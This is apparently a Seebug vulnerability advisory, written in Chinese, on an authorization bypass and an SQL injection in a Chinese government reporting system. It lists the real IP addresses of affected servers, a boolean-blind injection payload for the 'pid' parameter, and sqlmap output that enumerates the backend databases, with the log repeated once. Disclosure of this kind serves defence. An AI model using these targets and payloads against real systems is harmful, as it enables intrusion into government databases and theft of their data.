某政府系统一处越权+一处SQL注入

2015-01-06T00:00:00
ID SSV:94979
Type seebug
Reporter Root
Modified 2015-01-06T00:00:00

Description

简要描述:

RT

详细说明:

山东农友软件公司官网:http://www.nongyou.com.cn/ 越权案例如下: http://221.2.149.47:8100/jubao/left.aspx http://222.135.109.70:8100/jubao/left.aspx http://123.134.189.60:8012/jubao/left.aspx http://218.56.40.229:8020/jubao/left.aspx http://222.135.127.190:7000/jubao/left.aspx

<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

2.一处越权注入: http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid= http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid= 2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz


[18:13:11] [INFO] testing MySQL [18:13:11] [WARNING] the back-end DBMS is not MySQL [18:13:11] [INFO] testing Oracle sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n [18:13:12] [WARNING] the back-end DBMS is not Oracle [18:13:12] [INFO] testing PostgreSQL [18:13:12] [WARNING] the back-end DBMS is not PostgreSQL [18:13:12] [INFO] testing Microsoft SQL Server [18:13:12] [WARNING] reflective value(s) found and filtering out [18:13:12] [INFO] confirming Microsoft SQL Server [18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [18:13:13] [INFO] fetching database names [18:13:13] [INFO] fetching number of databases [18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [18:13:13] [INFO] retrieved: 12 [18:13:14] [INFO] retrieved: gangchengnl [18:13:22] [INFO] retrieved: gaoxinqunl [18:13:31] [INFO] retrieved: kaifaqunl [18:13:41] [INFO] retrieved: laichengnl [18:13:51] [INFO] retrieved: laiwunl [18:13:58] [INFO] retrieved: master [18:14:03] [INFO] retrieved: model [18:14:08] [INFO] retrieved: msdb [18:14:11] [INFO] retrieved: ReportServer [18:14:21] [INFO] retrieved: ReportServerTempDB [18:14:36] [INFO] retrieved: tempdb [18:14:41] [INFO] retrieved: xueyenl available databases [12]: [] gangchengnl [] gaoxinqunl [] kaifaqunl [] laichengnl [] laiwunl [] master [] model [] msdb [] ReportServer [] ReportServerTempDB [] tempdb [] xueyenl [18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator.sqlmap\output\123.134.189.60' ```

均可复现。

漏洞证明:

2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz


[18:13:11] [INFO] testing MySQL [18:13:11] [WARNING] the back-end DBMS is not MySQL [18:13:11] [INFO] testing Oracle sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n [18:13:12] [WARNING] the back-end DBMS is not Oracle [18:13:12] [INFO] testing PostgreSQL [18:13:12] [WARNING] the back-end DBMS is not PostgreSQL [18:13:12] [INFO] testing Microsoft SQL Server [18:13:12] [WARNING] reflective value(s) found and filtering out [18:13:12] [INFO] confirming Microsoft SQL Server [18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [18:13:13] [INFO] fetching database names [18:13:13] [INFO] fetching number of databases [18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [18:13:13] [INFO] retrieved: 12 [18:13:14] [INFO] retrieved: gangchengnl [18:13:22] [INFO] retrieved: gaoxinqunl [18:13:31] [INFO] retrieved: kaifaqunl [18:13:41] [INFO] retrieved: laichengnl [18:13:51] [INFO] retrieved: laiwunl [18:13:58] [INFO] retrieved: master [18:14:03] [INFO] retrieved: model [18:14:08] [INFO] retrieved: msdb [18:14:11] [INFO] retrieved: ReportServer [18:14:21] [INFO] retrieved: ReportServerTempDB [18:14:36] [INFO] retrieved: tempdb [18:14:41] [INFO] retrieved: xueyenl available databases [12]: [] gangchengnl [] gaoxinqunl [] kaifaqunl [] laichengnl [] laiwunl [] master [] model [] msdb [] ReportServer [] ReportServerTempDB [] tempdb [] xueyenl [18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator.sqlmap\output\123.134.189.60' ```

<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">